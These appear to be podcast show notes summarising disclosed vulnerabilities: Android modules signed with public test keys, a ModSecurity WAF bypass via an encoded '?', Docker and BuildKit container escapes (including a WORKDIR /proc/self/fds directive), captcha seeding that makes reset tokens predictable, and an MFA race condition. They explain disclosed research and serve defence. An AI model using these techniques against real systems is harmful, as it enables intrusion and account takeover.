Show Notes

239 - Public Private Android Keys and Docker Escapes

The issue itself is fairly easy to describe, Meta found that of 14 reputable brands seven had releases where one or more preinstalled APEX modules (privileged OS code) were signed using only the test keys that are publicly available in the Android Open Source Project (AOSP) repository.

The exact root cause of this is likely difficult to determine and the OEMs are unlikely to call anything out but Meta does raise a few possibilities:

  1. There is a Compatibility Test Suite which is supposed to enforce some compatibility issues and security guarantees. Looking at the signing keys used is part of both PackageSignatureTest and ApexSignatureVerificationTest. However both of these tests use hard-coded lists of keys which have overtime diverged from what the actual AOSP project uses as test-keys.
  2. The default problem is for AOSP to do the standard build using the test keys to sign all of the OTA updates, APKS, and APEX modules. The OEM should then run a separate script that will replace test keys with release keys according to a specified mapping. If one forgets to specify a test to release key mapping however the test key will just not be replaced without any warnings or indication.
  3. Official document is outdated and initially only mentions signatures being used for APKs and OTA updates, not APEX modules. Its only under the section “Advanced Signing Options” that APEX modules are even mentioned.

Andrea Menin brings us a great find with a deviously simple WAF bypass. The core bug belongs to ModSecurity and the variables it exposes to be used by the various rulesets others have created.

The concept here is simple the REQUEST_FILENAME variables normally should contain the entirety of the request path from the first / and ending with the start of the url parameters as designated by the ? character. For example /api/v3/example/endpoint?param=1 the REQUEST_FILENAME is /api/v3/example/endpoint

The problem is that it will attempt to decode any URL-encoded sequences in the path before it parses out the start of the parameters. So if a path were to include a %3F (the url-encoded format of ?). Any data after%3F would not be included in the REQUEST_FILENAMEvariable, even though the actual backend server is very likely to include it in the path. Creating room to easily smuggle in bits that would usually get blocked by a WAF/. the REQUEST_BASENAME and PATH_INFO variables are both impacted by this issue also.

Its long been a classic to abuse accidentally exposed file-descriptors through /proc/self/fds to break out of sandboxes, so its kinda fun to see a similar sort of bug impacting Docker. and enabling a container break-out either at run-time or during build time.

As you would expect Docker does close any file descriptors that point back to the host system before handing over control to the final sandboxed process.However during the build process some of the sensitive file descriptors that belong to the host-system are still open. So it is possible to hold a reference to the descriptor so that it remains open after docker has closed their references using the WORKDIR directive, for example: WORKDIR /proc/self/fds/5 (5 is just a made up descriptor number) and probably not a working payload for this.

With the reference held open, one could potentially chdir out into the host system and have escaped the confines of the container filesystem.

Deep within Buildkit there is access to the privileged GRPC API that could be abused to break out of a container during build-time.

This one is kinda cool because its relatively simple, generally speaking the only users of the GRPC API are privileged users through tools like the docker cli.In that context it kinda makes sense the the Container.Start command lacks any contextual authorization checking. However it turns out Dockerfiles have support for using a custom syntax via a # syntax=<path to docker image> line. This line will run the specified docker image and have that image process the Dockerfile, and send the intermediate representation of the Dockerfile over the GRPC API as such this docker image is given access to the api, and can reach other unexpected commands like the previously mentioned Container.Start command. This means the dockerfile custom syntax parser could start up an arbitrary container with any settings, including marking it as privileged (aka running as root on the host).

This is a great crypto issue that I think anyone could hunt for, it has to do with seeding of random number generators. Generally speaking in many systems if you know the seed you can break/predict the values that will come from the random number generator. This can actually be a somewhat useful feature as it allows repeatability of “random” events just by using the same seed.

In this case you have two systems that both depend on some randomness. First you have the password reset system, which generates a random token that is sent to the user so they can reset their password. The other system is the captcha system which uses it to generate a randomized image to be the captcha. The way the captcha’s image generator worked is it would take in a key value that was used to seed the random number generator. This was so requests for the same image with the same key would get in-fact get the same random image each time.

The problem is with this two systems existing together, one could use the /image/<key> endpoint to set the random number generators seed, and then go through the password reset flow. As the seed had just been reset, the verification code generated will be the same each time they reset the seed.

Though perhaps an accidental find by Abhi Sharma it is a great one none-the-less. With a race-condition leading to the bypass of a MFA check.

The MFA check in question here was before generating a person access token, so an attacker would already have to be in a fairly privileged position to take advantage of it. The gist of the issue though is just that spamming POST requests at the /api/integrations/personal_access_tokens endpoint used to generate new tokens would occasionally have a request get through without needing to pass the MFA check.

Exactly how this works is hard to say, but this did feel like exactly the sort of issue James Kettle was thinking of in his recent research on Smashing the State Machine. As, to me, this feels like it is possibly some transitory state in the system as its updating between need and not needing the MFA token to be filled out that perhaps while partially done can be hit for this MFA bypass. Ultimately that is speculation on my side, but its a neat bug to see.